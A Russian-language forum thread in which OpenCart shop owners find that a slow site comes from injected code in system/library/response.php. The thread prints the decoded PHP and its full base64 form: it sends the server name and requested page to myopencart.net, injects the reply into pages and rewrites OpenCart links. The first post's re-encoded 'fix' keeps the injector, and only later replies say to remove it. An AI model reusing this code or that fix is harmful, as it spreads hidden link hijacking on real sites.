Тормозил сайт из-за ссылки на myopencart.net

[Plinio]

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

 

1. после установки скрипта времени генерации страницы (вставлять в index.php - в начало 1 часть и в конец вторую часть кода):

 

 

 

 

// 1 часть кода

<?php  

// фиксация времени начала генерации страницы  
$begin = microtime();  
// матрица начального времени с секундами и миллисекундами  
$arrbegin = explode(" ",$begin);  
// Полное начальное время
$allbegin = $arrbegin[1] + $arrbegin[0];  

?>  

//......код файла index.php здесь.......

 

 

//  2 часть кода, ставится в конце:

<?php  

// фиксация времени останова   
$stop = microtime();  
// матрица времени останова с секундами и миллисекундами  
$arrend = explode(" ",$stop);  
// Полное время останова
$allend = $arrend[1] + $arrend[0];  
// вычитание из конечного времени начального  
$alltime = $allend - $allbegin;  

// вывод в браузер времени генерации страницы  
$format = "Страница сгенерирована за %f секунд";
printf($format,$alltime);  

?>

 

 

 

 

понял что страница на сайте грузится 5-6 секунд.

 

2. После 2 дней полемики с техподдержкой, мне дали нормальный ответ:

В коде сайта, точнее в файле system/library/response.php

есть следующая строка:

$ouput = eval(base64_decode(тут закодированный скрипт='));
Она находится в самом в конце, можете сами убедится.
Если его расшифровать, то получим следующий код:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "http://opencart.com", "http://=^_^=.ru",
"http://myopencart.ru", "https://opencartforum.com", "http://opencart.ru", "http://opencart.by");
$replace = array("", $ftend, "http://myopencart.net", "http://myopencart.net",
"http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}

Из которого видно что скрипт обращается к myopencart.net, для

которого не прописан IP:

$ dig a myopencart.net
; <<>> DiG 9.9.2-P1 <<>> a myopencart.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62470
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL:
0
;; QUESTION SECTION:
;myopencart.net.                        IN      A

3. В итоге на сайте _ttp://www.codenet.ru/services/base64_encode-base64_decode/ расшифровал зашифрованный код, опять же через этот сайт его зашифровал, только вместо myopencart.net, написал myopencart.ru

 

в итоге зашифрованный код установил в файл system/library/response.php вместо старого:

 

1. Такой был

ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0=

 

 

2 Такой стал

ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0LnJ1L2dvb2dsZWNvZGUvYXBpL2FwaS5waHA/c2VydmVyPSIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiZwYWdlPSIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKXsKJGZpbmQgPSBhcnJheSgiPC9ib2R5PiIsICI8L2h0bWw+IiwgIm9wZW5jYXJ0LmNvbSIsICJtYXh6b24ucnUiLCAibXlvcGVuY2FydC5ydSIsICJvcGVuY2FydGZvcnVtLnJ1IiwgIm9wZW5jYXJ0LnJ1IiwgIm9wZW5jYXJ0LmJ5Iik7CiRyZXBsYWNlID0gYXJyYXkoIiIsICRmdGVuZCwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1IiwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1Iik7CiRvdXB1dCA9IHN0cl9yZXBsYWNlKCRmaW5kLCAkcmVwbGFjZSwgJG91cHV0KTsKaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCJvZmYiKTsKZXJyb3JfcmVwb3J0aW5nKDApOwplY2hvICRvdXB1dDt9CmVsc2UgewplY2hvICRvdXB1dDsKfQ==

 

 

 

 

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

Змінено 25 червня 2013 користувачем rb2
unlink

[dustin]

Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

[Plinio]

Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

Неправильно даже сделал оказывается, более правильно написано в разделе форума:

 

https://opencartforum.com/topic/22202-proverka-na-nalichie-vredonosnogo-koda-na-vashikh/

[delovoy]

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

[exael]

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

[Plinio]

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

Нужно заменить файл response.php на нормальный, не взломанный http://opencartforum...oda-na-vashikh/

[gsnx]

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

...........

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

 

Спасибо за пояснение!

А какая у вас версия опенкарта?

Почему недоработка? Это же поясняется в этой ветке настоящего форума, это заражение файла было! Удалите этот код, либо просто файл замените!

 

Я для проверки скачал два разных дистрибутива ocStore 1.5.4.1 с какого-то стороннего ресурса и с гугла хранилища, ни в одном нет такого кода, ну понятное дело что это было не на всех архивах. Да и дистрибутивы от октября 2012 года, хотя написано что заражены были в апреле 2013 где-то они...

 

Будем знать что такое бывает. Только стал просматривать инфу по установке магазина и "на тебе" такие заявочки нехорошие...